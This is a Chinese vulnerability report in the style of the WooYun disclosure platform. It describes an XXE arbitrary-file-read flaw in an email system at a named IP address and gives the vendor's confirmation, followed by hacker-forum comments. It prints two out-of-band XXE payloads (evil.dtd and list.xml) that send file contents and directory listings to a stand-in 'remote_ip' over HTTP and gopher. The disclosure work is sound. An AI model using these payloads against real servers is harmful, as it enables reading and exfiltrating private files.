唯品会某系统存在远程XXE读取任意文件漏洞

参看陈老师的“Xfire文件读取漏洞”

WooYun: Xfire文件读取漏洞

系统连接：汉启的邮件系统

http://221.228.212.171:8081/smartedm/welcome.do

对应link

http://221.228.212.171:8081/smartedm/services

采用AWVS验证：

读文件：

列目录：

evil.dtd内容：

<?xml version="1.0" encoding="UTF-8"?>
 <!ENTITY % all
 "<!ENTITY &#x25; send SYSTEM 'http://remote_ip/?%file;'>"
 >%all;

list.xml文件内容：

<!ENTITY % a SYSTEM "file:///">
 <!ENTITY % b "<!ENTITY &#37; c SYSTEM 'gopher://remote_ip:port/?%a;'>">
 %b;
 %c;

1.联系厂商，参看陈老师的“Xfire文件读取漏洞”

WooYun: Xfire文件读取漏洞

厂商回应：

危害等级：中

漏洞Rank：10

确认时间：2016-03-24 17:52

厂商回复：

经确认，该问题真实存在，现已联系相关人员进行处理，感谢对我们业务的支持与贡献！

最新状态：

暂无

1. 2016-03-24 16:31 | _Thorns ( 普通白帽子 | Rank:1754 漏洞数:269 | 以大多数人的努力程度之低，根本轮不到去拼...)

   1

   陈老师发的0day吗。

   1# 回复此人

2. 2016-03-24 16:47 | 刺刺 ( 普通白帽子 | Rank:711 漏洞数:65 | 真正的安全并不是技术，而是人类善良的心灵...)

   1

   @_Thorns 是的 陈老师很坑啊，6WB要收回一点点啊。

   2# 回复此人

3. 2016-03-24 17:02 | _Thorns ( 普通白帽子 | Rank:1754 漏洞数:269 | 以大多数人的努力程度之低，根本轮不到去拼...)

   1

   @刺刺 你早说嘛，那么多POC。我全部发给你，你给我5WB就行。。。

   3# 回复此人

4. 2016-03-24 20:24 | LoveSnow ( 实习白帽子 | Rank:85 漏洞数:20 | 以正和，以奇胜！)

   1

   @_Thorns @刺刺 陈老师，是冠希吗？他都来挖洞了？

   4# 回复此人

5. 2016-03-24 20:30 | LoveSnow ( 实习白帽子 | Rank:85 漏洞数:20 | 以正和，以奇胜！)

   1

   @刺刺 @_Thorns 哦哦，是applechen,哈哈

   5# 回复此人